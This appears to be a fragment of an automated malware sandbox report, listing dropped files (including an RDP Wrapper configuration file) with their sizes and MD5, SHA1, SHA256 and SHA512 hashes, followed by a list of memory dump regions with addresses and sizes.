48KB

MD5
717a1b9b62a41e3be5e271c2e8260c37

SHA1
a7bb15320a7630cb8ca7832f47b9bb9f7693376d

SHA256
fd30783e367862e0d9083af1e12b4fa0edd93bb7978a355212cad8c85ab1a480

SHA512
c50f349b1029805b747fae40713f865c36dc83b6553a1439dfab32a3cb3b13603b00caa2d4656b81b40d9fd4cd649abbe131f6aacd31ddd3d0448d55e2babe8a

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
432KB

MD5
03a0f53a4e7702d676d485af3cc17561

SHA1
27d45d2732f7592d9713977bc69e02f2997fc879

SHA256
da25861aea3ba907e42fea0884f4ffb3fe9c5382c28adc9bcc395bf4de367220

SHA512
9cc15378b4c55c77ecc08434eb7d36aeb4f18a4353f5ec02e385d49fc0e09ff1d4639053bb15220af5a3a58c5ebd39472d3e039a12c115d45133deb43883d15d

Download Submit
memory/1584-1-0x00000231F1880000-0x00000231F18A4000-memory.dmp

Filesize
144KB

Download
memory/1584-2-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

Filesize
10.8MB

Download
memory/1584-19-0x00007FFD6ECA3000-0x00007FFD6ECA5000-memory.dmp

Filesize
8KB

Download
memory/1584-20-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

Filesize
10.8MB

Download
memory/1584-0-0x00007FFD6ECA3000-0x00007FFD6ECA5000-memory.dmp

Filesize
8KB

Download
memory/1584-34-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

Filesize
10.8MB

Download
memory/3480-13-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

Filesize
10.8MB

Download
memory/3480-12-0x000001BBC4630000-0x000001BBC4652000-memory.dmp

Filesize
136KB

Download
memory/3480-18-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

Filesize
10.8MB

Download
memory/3480-14-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

Filesize
10.8MB

Download
memory/3480-17-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

Filesize
10.8MB

Download
memory/3520-33-0x0000015FF3B00000-0x0000015FF3CE8000-memory.dmp

Filesize
1.9MB

Download
memory/4796-104-0x00007FFD7E7D0000-0x00007FFD7E7F6000-memory.dmp

Filesize
152KB

Download
memory/4796-108-0x00007FFD7E7D0000-0x00007FFD7E7F6000-memory.dmp

Filesize
152KB

Download
memory/4980-98-0x0000000000400000-0x00000000005AF000-memory.dmp

Filesize
1.7MB

Download
memory/4980-106-0x0000000000400000-0x00000000005AF000-memory.dmp

Filesize
1.7MB

Download